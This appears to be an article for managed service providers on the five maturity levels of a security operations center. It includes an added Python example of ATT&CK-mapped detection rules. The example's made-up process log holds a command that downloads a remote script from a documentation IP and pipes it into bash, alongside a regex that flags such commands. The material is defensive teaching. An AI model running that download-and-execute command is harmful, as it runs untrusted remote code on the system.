For MSPs that offer cybersecurity services, the security operations center (SOC) has emerged as a critical strategy for protecting client networks. While security software tools can help prevent some types of attacks, the SOC offers the threat detection, investigation and response capabilities necessary to fend off complex attacks. It also uses information gathered from those incidents to put safeguards and processes in place to prepare for future episodes.
Most small and midsize companies and the managed service providers that work with them don’t have the resources or expertise to set up their own 24/7 SOC. An effective SOC requires constant monitoring, adequate staffing and the ability to equip its staff with the latest security tools and security processes to keep pace with rapidly evolving threats. That’s why many MSPs have turned to third-party SOCs, which provide services they can resell across their client base without the high investment required for staffing and building the infrastructure internally.
Not all SOCs are created equal. MSPs need to evaluate the maturity level of the security operations center they consider doing business with. It’s tempting to use easy-to-understand metrics such as speed and efficiency (mean time to detect or mean time to respond, for example). But that approach is insufficient to ensure MSPs and their clients have access to a thorough analysis and post-mortem of each incident that can help them plan for the future.
A SOC must offer more than just monitoring and alerting — it must provide experience, breadth of security coverage, advanced analysis and modern tools for protecting your clients.
Security Operations Center (SOC) Level Primer
For customers seeking security operations center services, understanding the differences between SOC maturity levels can be the key to ensuring their digital assets are well protected. The levels are:
Level 1: Basic
At the basic level, a SOC operates during business hours and is staffed by analysts with foundational network security and operating system skills. They might hold certifications such as Security+ and Network+, but their processes and technology are relatively simple. For example, the SOC runs a basic security information and event management (SIEM) system with out-of-the-box detection rules and follows simple incident escalation procedures.
Level 2: Intermediate
An intermediate security operations center has 24/7 coverage and is staffed by analysts with more advanced skills. The team understands intrusion detection systems (IDS), intrusion prevention systems (IPS) and SOC tools such as SIEM. Holding certifications such as certified ethical hacker (C|EH) and cybersecurity analyst (CySA+), they are also beginning to develop threat-hunting capabilities and the ability to respond to emerging threats. Technology-wise, they use a midlevel SIEM and open-source threat intelligence.
Level 3: Advanced
An advanced SOC operates 24/7 and introduces a specialized team with skills in cloud computing, endpoint security, auditing and threat analysis as well as familiarity with various adversary attack tactics and techniques. Key certifications at this level include AWS cloud practitioner and Azure fundamentals. The advanced security operations center uses intermediate endpoint tools and malware sandboxing, and the team manually maintains “allow and block” lists for better control over network traffic.
Level 4: Optimized
At the optimized level, the security operations center operates 24/7 with a team holding advanced certifications such as GIAC (Global Information Assurance Certification), AWS solutions architect and AWS developer. Their skills now include deep experience with live attacks from various advanced persistent threats (APTs) and with advanced SOC tools such as security orchestration, automation and response (SOAR). They are also proficient in Bash shell scripting, which allows for a more efficient and automated response to incidents.
Their processes have evolved to include advanced threat hunting, attack and defend exercises, and the ability to correlate logs across multiple data sources. This level of maturity empowers the SOC to detect and respond to complex threats swiftly and effectively.
Regarding technology, the optimized SOC pairs SOAR with hundreds of signature-based detections, each mapped to a technique in the MITRE ATT&CK framework so that coverage gaps and alert context are expressed in a common adversary-behavior vocabulary. This combination of advanced skills, processes and technology makes the optimized SOC well equipped to handle sophisticated cyberthreats.
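To make the two preceding paragraphs concrete, here is an added example (not code from the original article or from any vendor it describes) of what "signature-based detections mapped to ATT&CK" and "correlating logs across multiple data sources" look like in practice. Each rule carries an ATT&CK technique ID, the rules run over two constructed log sources (an sshd auth log and an EDR-style process log), and a correlation step chains individual hits on the same host into a single higher-severity alert. All log lines, hostnames, IPs (RFC 5737 documentation ranges), thresholds and rule IDs are made up for the example.

```python
"""Toy detection engine: ATT&CK-tagged signature rules run over constructed
sshd and process-log lines, then correlated by host and time window."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data (not real logs). ISO 8601 timestamps for simplicity.
AUTH_LOG = """\
2024-05-01T10:00:01 host-a sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51000 ssh2
2024-05-01T10:00:03 host-a sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51001 ssh2
2024-05-01T10:00:05 host-a sshd[1201]: Failed password for root from 203.0.113.5 port 51002 ssh2
2024-05-01T10:00:07 host-a sshd[1201]: Failed password for root from 203.0.113.5 port 51003 ssh2
2024-05-01T10:00:09 host-a sshd[1201]: Failed password for root from 203.0.113.5 port 51004 ssh2
2024-05-01T10:00:12 host-a sshd[1203]: Accepted password for root from 203.0.113.5 port 51005 ssh2
2024-05-01T10:30:00 host-b sshd[2201]: Accepted publickey for deploy from 198.51.100.7 port 40000 ssh2
"""
PROC_LOG = """\
2024-05-01T10:00:40 host-a user=root parent=bash cmd=curl -fsSL http://203.0.113.9/x.sh | bash
2024-05-01T10:31:00 host-b user=deploy parent=bash cmd=systemctl restart app
"""

AUTH_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<result>Accepted|Failed) \S+ for "
                     r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
PROC_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
PIPE_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")   # downloader piped into a shell

BRUTE_THRESHOLD = 5                      # failed logins ...
BRUTE_WINDOW = timedelta(seconds=60)     # ... inside this window
CORRELATION_WINDOW = timedelta(minutes=5)


def parse_events(auth_text, proc_text):
    """Normalise both sources into one time-ordered list with a shared schema."""
    events = []
    for line in auth_text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            d = m.groupdict()
            events.append({"source": "auth", "ts": datetime.fromisoformat(d["ts"]), "host": d["host"],
                           "user": d["user"], "src": d["src"], "result": d["result"]})
    for line in proc_text.splitlines():
        m = PROC_RE.match(line)
        if m:
            d = m.groupdict()
            events.append({"source": "proc", "ts": datetime.fromisoformat(d["ts"]), "host": d["host"],
                           "user": d["user"], "parent": d["parent"], "cmd": d["cmd"]})
    return sorted(events, key=lambda e: e["ts"])


def detect_bruteforce(events):
    """T1110.001: >= BRUTE_THRESHOLD failed sshd logins from one source to one host within BRUTE_WINDOW."""
    fails = defaultdict(list)
    for e in events:
        if e["source"] == "auth" and e["result"] == "Failed":
            fails[(e["host"], e["src"])].append(e["ts"])
    alerts = []
    for (host, src), times in fails.items():
        for i in range(len(times) - BRUTE_THRESHOLD + 1):
            if times[i + BRUTE_THRESHOLD - 1] - times[i] <= BRUTE_WINDOW:
                alerts.append({"technique": "T1110.001", "host": host, "src": src, "ts": times[i + BRUTE_THRESHOLD - 1]})
                break                      # one alert per (host, source) pair
    return alerts


def detect_pipe_to_shell(events):
    """T1059.004: a remote script downloaded and piped straight into a Unix shell."""
    return [{"technique": "T1059.004", "host": e["host"], "user": e["user"], "ts": e["ts"], "cmd": e["cmd"]}
            for e in events if e["source"] == "proc" and PIPE_RE.search(e["cmd"])]


# The "signature library": each rule is tagged with the ATT&CK technique it covers.
RULES = [
    {"id": "R-001", "technique": "T1110.001", "name": "SSH password-guessing burst", "detect": detect_bruteforce},
    {"id": "R-002", "technique": "T1059.004", "name": "Remote script piped to shell", "detect": detect_pipe_to_shell},
]


def correlate(events, alerts):
    """Cross-source chain: brute force from src -> Accepted login from that src on the same host
    -> shell-pipe execution on that host, each step inside CORRELATION_WINDOW. The successful
    login after guessing is the T1078 (Valid Accounts) step, so the chain is mapped to three techniques."""
    chains = []
    for b in (a for a in alerts if a["technique"] == "T1110.001"):
        logins = [e for e in events if e["source"] == "auth" and e["result"] == "Accepted"
                  and e["host"] == b["host"] and e["src"] == b["src"]
                  and b["ts"] <= e["ts"] <= b["ts"] + CORRELATION_WINDOW]
        for login in logins:
            for x in (a for a in alerts if a["technique"] == "T1059.004" and a["host"] == b["host"]
                      and login["ts"] <= a["ts"] <= login["ts"] + CORRELATION_WINDOW):
                chains.append({"severity": "critical", "host": b["host"], "src": b["src"], "user": login["user"],
                               "techniques": ["T1110.001", "T1078", "T1059.004"], "cmd": x["cmd"]})
    return chains


def run(auth_text=AUTH_LOG, proc_text=PROC_LOG):
    """Run every rule, correlate the hits, and report ATT&CK coverage (technique -> number of rules)."""
    events = parse_events(auth_text, proc_text)
    alerts = []
    for rule in RULES:
        for a in rule["detect"](events):
            a["rule"] = rule["id"]
            alerts.append(a)
    coverage = defaultdict(int)
    for rule in RULES:
        coverage[rule["technique"]] += 1
    return {"alerts": alerts, "chains": correlate(events, alerts), "coverage": dict(coverage)}


if __name__ == "__main__":
    result = run()
    for a in result["alerts"]:
        print(f"[{a['rule']}] {a['technique']} on {a['host']} at {a['ts']}")
    for c in result["chains"]:
        print(f"CRITICAL {c['host']}: {' -> '.join(c['techniques'])} ({c['user']} from {c['src']}): {c['cmd']}")
    print("coverage:", result["coverage"])
```

The coverage dictionary is the "mapped to ATT&CK" view a maturity assessment actually asks about: which techniques have at least one rule, and which have none. The correlation step is what separates a Level 4 SOC from a Level 1 one in this article's terms: on their own, the two individual hits are a noisy auth alert and a suspicious-command alert on different log sources; joined by host, source IP and time window they become one critical incident.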
Level 5: Innovative
The innovative level 5 SOC operates 24/7 using a "follow-the-sun" model with specialized, geographically distributed teams. At this level, the teams have a comprehensive skill set that covers defensive and offensive security tooling, software development and AI/ML. They also bring programming skills such as Python, widely used in cybersecurity for automating incident response, data analysis, machine learning/AI and threat modeling, and they work from a state-of-the-art security orchestration, automation and response (SOAR) platform and threat intelligence platform (TIP).
Their certifications range from certified information systems security professional (CISSP) and certified information systems auditor (CISA) to GIAC Certified Incident Handler (GCIH).
The innovative SOC boasts advanced processes, including automated runbook mapping, advanced attack and defend exercises and rapid zero-day threat coverage. The technology at this level is state-of-the-art.